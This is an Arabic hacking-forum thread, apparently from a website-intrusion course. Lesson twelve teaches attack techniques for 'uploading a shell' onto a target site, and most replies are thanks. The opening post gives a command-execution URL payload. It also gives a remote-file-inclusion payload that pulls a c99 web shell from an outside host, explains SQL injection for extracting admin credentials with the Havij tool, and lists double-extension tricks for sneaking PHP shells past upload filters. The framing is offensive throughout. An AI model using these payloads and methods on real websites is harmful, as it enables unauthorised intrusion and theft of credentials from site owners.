|ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

|ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها


صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 10 من 23

الموضوع: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

  1. #1

    Post |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة لله وبركاتة
    الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد


    درسنا اليوم هو انواع الثغرات وشرحها ..

    على بركة الله

    كيف يتم رفع الشيل ؟؟
    رفع الشل يتم عن طريق اكتشاف ثغرة معينة تمكننا من رفع الشل
    يعني الشل يتم رفعة عن طريق ثغرة.
    وللثغرات انواع كثيرة, وطرق اكتشافها كثير جدا جدا.



    ما هي الثغرة ؟؟
    الثغرة هي خطء برمجي يقع فيه المبرمج اثناء برمجتة لشيء.



    ولكي تتمكن من استهداف موقع معين يجب عليك البحث عن ثغرات لكي تتمكن من رفع الشل وتخترق موقع الهدف.
    وليس شرطا ان تكون هذه الثغرات داخل موقع الهدف.!
    يعني لو كان الموقع المستهدف ما فية ثغرات نتركة مثلا ؟!؟
    بالطبع لا.
    بعد ان قمنا بجمع معلومات عن موقع الهدف (الي تحدثنا عنها بدرسنا السابق) هذه المعلومات هي التي ستساعدنا وتوصلنا الى اختراق الموقع

    كيف ذلك ؟؟
    لنفترض انه موقع الهدف ما فيه ثغرات اوك ؟
    طيب الان بعد ان انتهينا من جمع معلومات عن موقع الهدف
    مثل: مواقع السيرفر، استضافة السيرفر، IP السيرفر ...الخ
    هؤلاء هم من سيمكنوننا من دعس موقع الهدف

    تقلي كيف ذلك ؟؟
    اقلك راجع الدرس السابق, تعرف
    لانه هذا كلة حكيتة بالدرس السابق وما بدي ارجع احكية كمان مرة
    مش لاني بدي اختصر
    بس لاني لو اسا بدي احكيلكم كيف نستفيد من المعلومات الي جمعناها رح يكون نفس الحكي الي حكيتة بالدرس السابق.
    لهيك راجع الدرس السابق الله يستر عليك



    طيب يلا نبدء بالتحدث على بعض انواع الثغرات ونشرحها


    1- sql injection | سكيول انجكشن | أس كيو أل انجكشن | ثغرات الحقن.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    هذه الثغره روعة لانها الاكثر انتشار في هذه الايام وضروري جدا جدا ان تتعلمها لانها تفيدك كثير وتحتاجها كثير
    هذه الثغره ليس مثل باقي الثغرات, يعني ثغرات الحقن SQL Injection تختلف عن باقي انواع الثغرات.
    لانك تحتاج الى خبرة لكي تتمكن من استغلال هذه الثغرات

    مفعولها:: بعد حقنك للموقع المصاب>> ستتمكن من سحب يوزر وباسوورد الادمن, وغالبا تكون مشفر.
    تفضلو هذه دورة اسديلي لتعليم ثغرات الحقن sql injection
    http://www.aljyyosh.com/vb/forumdisplay.php?f=76

    وكذلك يوجد برامج لاستغلال هذه الثغرات, ومن اشهر واقوى البرامج لاستغلال ثغرات الحقن برنامج هافج Havij



    2- Command Execution | ثغرة الكوماند | تنفيذ الاوامر.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    هي الثغره جميله جدا. تمكنك من تنفيذ اوامر الينكس مباشر على الموقع دون حاجة للشل, وهذه الثغرة تعد من اخطر الثغرات
    مثال على الثغرة:
    كود:
    www.site.com/qtronix.php?fox=ls -la
    نشرحها.
    www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
    qtronix.php?: اسم الملف المصاب بالثغرة.
    fox=: المتغيير المصاب والي رح يتم تنفيذ اوامر الينكس عليه.
    ls -la: امر من اوامر الينكس
    وظيفتة: يعرض لك جميع الملفات والمجلدات + تصاريحها + وقت انشائها ..الخ

    وبالنسبة لاوامر الينكس, سبق وتحدثنا عنها وشرحناها بالتفضيل الممل وبالفيديو.
    وبأمكانك مراجعة درس اوامر الينكس من هنا

    القسم الاول
    http://www.aljyyosh.com/vb/showthread.php?t=33974
    القسم الثاني
    http://www.aljyyosh.com/vb/showthread.php?t=33977



    3-Remote File Inclusion | ثغرات فايل انكلود.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    ثغرة رائعة وجميلة جدا وايضا هذة تعد من اخطر الثغرات.
    تمكنك من رفع شل مباشر على الموقع, كل ما تحتاجه هو فقط شل بأمتداد txt مرفوع على موقع.
    مثال على الثغرة:
    كود:
    http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?
    نشرحها.
    www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
    qtronix.php?: اسم الملف المصاب بالثغرة.
    fox=: المتغيير المصاب والذي ستم وضع رابط الشل الي بامتداد txt عليه.
    http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل عشان يستعرض معك الشل ..



    4- Remote File Upload | ريموت فايل ابلود | ثغرة الرفع | ثغرة الابلود.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    ثغرة رائعة وجميلة جدا وايضا هذة الثغرة تعد من اخطر الثغرات, تمكنك من رفع الشل.

    تتواجد هذه الثغرات في مراكز الرفع ..
    طبعا لن تكون هذه الثغرة في جميع مراكز الرفع.! بالطبع لا. اسمها ثغرة, (يعني خطء برمجي / غباء من المبرمج)
    يوجد مراكز رفع تسمح لك برفع ملفات بامتداد PHP
    وفي حال ما رفع معك ملف الـ PHP (الشل), بأمكانك ان تقوم بتغيير امتداد الشل الى صيغة صورة او تضغطه بالـ WinRAR ..
    مثال:
    r57.php.zip / r57.php.rar / r57.php.jpg ...

    وفي حال ما ضبطو معك الطريقتين.. معناته المركز ما فيه ثغرة الريموت فايل ابلود, Remote File Upload



    انتهى الدرس
    اتمنى انه قد كان درس واضح ومفهوم للجميع..
    ولا تنسو من صالح دعائكم..

    تحياتي ..
    اخوكم QtRoNiX FoX

    التعديل الأخير تم بواسطة QtRoNiX FoX ; 08-25-2013 الساعة 05:42 PM

    لا تترك صلاتك ابداً
    فهناك ألملايين تحت ألقبور يتمنون لو تعود بهم الحياة
    لـ يسجدو لو سجدة واحدة !



    اللهم صل وسلم وبارك على سيدنا محمد وعلى اله وصحبه اجمعين

    أستغفر الله العظيم الذي لا إله إلا هو الحي القيوم وأتوب إليه

  2. #2

    افتراضي رد: ~الدرس العاشر~ طرق استهداف المواقع - الجزء الثاني [الثغرات وانواعها + حديث عنها]


    ربي يعطيكـ العافيه
    يا خي كل يوم أدخل المنتدى و اشوف نزل الدرس العاشر ولا لا
    ههههه
    متابع دروسكـ اول بأول بس يا ليت ما تتأخر
    آحي ان جاتني نفسية هههه
    الا على طاري الدروس السابقه ترا تم حفظها بنكـكـ القديم
    أستمر يآ كنق
    تحيايتي

  3. #3

    افتراضي رد: ~الدرس العاشر~ طرق استهداف المواقع - الجزء الثاني [الثغرات وانواعها + حديث عنها]

    اقتباس المشاركة الأصلية كتبت بواسطة اخلاقي تاج راسي مشاهدة المشاركة

    ربي يعطيكـ العافيه
    يا خي كل يوم أدخل المنتدى و اشوف نزل الدرس العاشر ولا لا
    ههههه
    متابع دروسكـ اول بأول بس يا ليت ما تتأخر
    آحي ان جاتني نفسية هههه
    الا على طاري الدروس السابقه ترا تم حفظها بنكـكـ القديم
    أستمر يآ كنق
    تحيايتي
    هلا 'اخلاقي'
    والله يالغالي انشغالات كثيرة وما بفضى كثير
    بس هاي المرة كان الدرس جاهز من زمان بس ما كنت بغضر انزله لانه صارت لخبطة صغيرة
    عدلت على جميع دروس الدورة وامبيرح لحتى انتهيت من التعديل واليوم لحتى فضيت انزل الدرس ...
    على كل حال منور يالغالي ومشكور على ردك
    تحياتي..
    بالتوفيق ان شاء الله.
    التعديل الأخير تم بواسطة QtRoNiX FoX ; 09-19-2012 الساعة 02:13 PM

  4. #4

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكووووووووووووور
    ConanCoder

  5. #5

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    واصل بدون فواصل يا غالي

  6. #6
    هكر مبتديء الصورة الرمزية هكر فاضي
    تاريخ التسجيل
    Sep 2010
    الدولة
    عالم لا رحمة فيه
    المشاركات
    95

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكور عالشرح الجميل يعطيك العافية

  7. #7

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكوووووور اخي . رااااااااااااااااءع

  8. #8
    هكر مجتهد الصورة الرمزية dark haCk
    تاريخ التسجيل
    Apr 2012
    الدولة
    في قلب الحـــــــدث
    المشاركات
    288

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    يعطيك الف عافية ياغالي ~>ربي يحفظك من كل شر ع المجهود اللي تبذله وشروحاتك الرائعة
    الوفاء و الاخلاص يصعب على ناس..:..و الخسيس بدري عليه يطول المرجلة
    الصدق بـ هالزمن عمله بدون قياس..:..والكذب أصبح جواب لكل الاسئلة
    تبدي نصيحة للرفيق ويجعل للزعل نبراس..:..ويكون جزاء المعروف الهجران والصده
    عجزت أفهمك يا زمن بدون ما أحتاس..:..وإلا كيف تكون غالي في غياب المصلحة
    تدور بك دنياك وتقر إن البشر أجناس..:..ويحدك زمانك على الضيق فأشكره

  9. #9

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكور شرح رائع حبيبي
    | الجيـــــش الســـــوري الحــــر |
    ##############
    #############
    ##############
    " فريق قراصنة الثورة السورية "

  10. #10

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    بارك الله فيك اخي

صفحة 1 من 3 123 الأخيرةالأخيرة

المواضيع المتشابهه

  1. |ألدرس الحادي عشر| طرق استهداف المواقع - جمع معلومات عن الموقع المستهدف
    بواسطة QtRoNiX FoX في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 50
    آخر مشاركة: 05-16-2014, 06:56 PM
  2. الدرس الثالث: خطوات استهداف المواقع .. الجزء الاول
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 82
    آخر مشاركة: 04-30-2012, 03:12 AM
  3. الدرس ( 4 ) - [ صندوق الأدوات - الجزء الثاني ]..
    بواسطة Mostafa.X في المنتدى منتدى الإستايلات والتصاميم
    مشاركات: 4
    آخر مشاركة: 11-17-2011, 03:38 PM
  4. الدرس العاشر: استغلال الثغرات المكتوبة بلغة html
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 30
    آخر مشاركة: 01-21-2011, 02:25 AM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •